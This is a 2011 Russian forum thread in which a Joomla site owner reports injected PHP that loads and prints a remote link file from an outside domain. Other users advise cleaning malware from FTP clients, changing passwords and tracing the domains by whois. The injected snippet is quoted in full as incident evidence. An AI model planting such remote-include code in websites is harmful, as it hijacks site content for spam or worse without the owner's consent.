X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Стороннее вмещательство и как с ним бороться, Внедрение чужеродных кодов
Armal
Armal
Topic Starter сообщение 22.2.2011, 20:23; Ответить: Armal
Сообщение #1


Ночью при контрольном обходе заметил стороннее вмешательство в работу сайта, шапку перекоробило минут на десять, потом все встало на место.
Так как сам в текущий день действий с сайтом не производил, провел ревизию и обнаружил вставку кода:

<?php } ?><? $url = "http://foxmagazin.ru/link.txt"; $homepage = file_get_contents ('http://foxmagazin.ru/link.txt'); $Headers = @get_headers($url);
if(preg_match("|200|", $Headers[0])) { echo $homepage;} ?>

прямо под шапкой сайта. Код был удален, пароли заменены.
Сайт у меня используется не для продажи ссылок, коды для продажи не устанавливал точно, остается одно - кто то какими то средствами попал в святую-святых любого сайтостроителя!
Сталкиваюсь с таким впервые, подскажите, как это называется на Сео сленге, как с этим бороться и какие меры можно предпринять к такому сео-мастеру-паразиту, ежели вычислить?


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
opariks
opariks
сообщение 22.2.2011, 21:10; Ответить: opariks
Сообщение #2


Вы бы описали подробнее о своем сайте, какая CMS и т.д. Доступ к сайту у вас или еще у кого? Может вовсе взлом был не с сайта, а через ваш компьютер? Подробнее пожалуйста.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
isay777
isay777
сообщение 22.2.2011, 21:21; Ответить: isay777
Сообщение #3


Была подобная проблема боролся неделю.
оказалось это вирус засел в ДВУХ!!! фтп клиентах в filezille и cuteftp и все пароли сколько бы не менял передавал хозяину. Мой запускал бота через ай пи украины.
Спасло полная чистка от вирусов снос всех фтп клиентов под 0 (совсем под 0, вместе с хистори и т.д.) замена всех паролей и от панелей и от фтп.
Чистка всех зараженных сайтов. Если что есть специальны скрипты, ну или ctrl+f.

Удачи в чистке. (если что пиши - дам скрипт и пару советов)

PS не доверяю теперь фтп клиентам.

Сообщение отредактировал isay777 - 22.2.2011, 21:22
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Armal
Armal
Topic Starter сообщение 22.2.2011, 21:53; Ответить: Armal
Сообщение #4


JOOMLA, доступ только у меня, по FTP захожу через Total Commander, на компе Norton AntiVirus лицензия.

Сообщение отредактировал Armal - 22.2.2011, 21:54


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
lamensel
lamensel
сообщение 22.2.2011, 21:57; Ответить: lamensel
Сообщение #5


Не храните пароли от фтп в истории.
С такой штукой, как у вас еще ни разу не сталкивался к счастью.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
EvilGomel
EvilGomel
сообщение 22.2.2011, 22:00; Ответить: EvilGomel
Сообщение #6


по FTP захожу через Total Commander


Главная ошибка!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Maxim-KL
Maxim-KL
сообщение 22.2.2011, 22:03; Ответить: Maxim-KL
Сообщение #7


Вот люблю я таких людей Total Commander еще установите антивирус Avast и вы просто мечта для взломщиков .


--------------------
Забанен за мошенничество
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Armal
Armal
Topic Starter сообщение 22.2.2011, 23:21; Ответить: Armal
Сообщение #8


(Maxim-KL @ 22.2.2011, 21:03) *
Вот люблю я таких людей Total Commander еще установите антивирус Avast и вы просто мечта для взломщиков .


Антивирь у меня достойный, а тоталом для меня удобнее всего, скажи какой антивирь у тебя и чем заходишь на сервер, а то как то на флуд смахивает.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
phpsin
phpsin
сообщение 23.2.2011, 14:51; Ответить: phpsin
Сообщение #9


1. Не когда не храните пароли на компе
2. Используйте более менее нармальный антивирусник хотябы Каспера
3. Проведите небольшой анализ: Откройте файл http://foxmagazin.ru/link.txt при просмотре html кода вы увидите
<a href="http://lifedn.ru"></a>
<a href="http://isvalaam.ru"></a>

Проверьте эти три домена по whois и Вы увидете, что все они пренадлежат одному и тому же человеку, плюс там же есть данные об этом человеке, что делать дальше решать Вам...

PS: Но не стоит забывать и о том, что этого человека могли и подставить данным образом, и он такой же пострадавший как и Вы...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
isay777
isay777
сообщение 24.2.2011, 14:42; Ответить: isay777
Сообщение #10


Да кстати про тотал командер мне то же говорили - что очень не надежен. Ключи держит там где легко достать.

Я теперь пароли руками ввожу с блокнота. Пока не надоело. Не знаю на сколько меня хватит.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Арбитражники, как ведете учет расходов и доходов?
12 Boymaster 1906 Вчера, 21:03
автор: MisterBit
Горячая тема (нет новых ответов) Как вывести деньги в Украине с заблокированного Юмани ?
29 freeax 4812 17.4.2024, 1:19
автор: sergio11
Горячая тема (нет новых ответов) Как вы отдыхаете от работы за компом
148 adw-kupon.ru 19711 8.4.2024, 10:37
автор: Skyworker
Открытая тема (нет новых ответов) Как вы бросили работу и перешли на заработок с сайтов?
18 uahomka 3104 5.4.2024, 5:53
автор: Skyworker
Горячая тема (нет новых ответов) Как бездомные хранят деньги?
81 metvekot 13657 31.3.2024, 12:44
автор: Boymaster


 



RSS Текстовая версия Сейчас: 20.4.2024, 0:05
Дизайн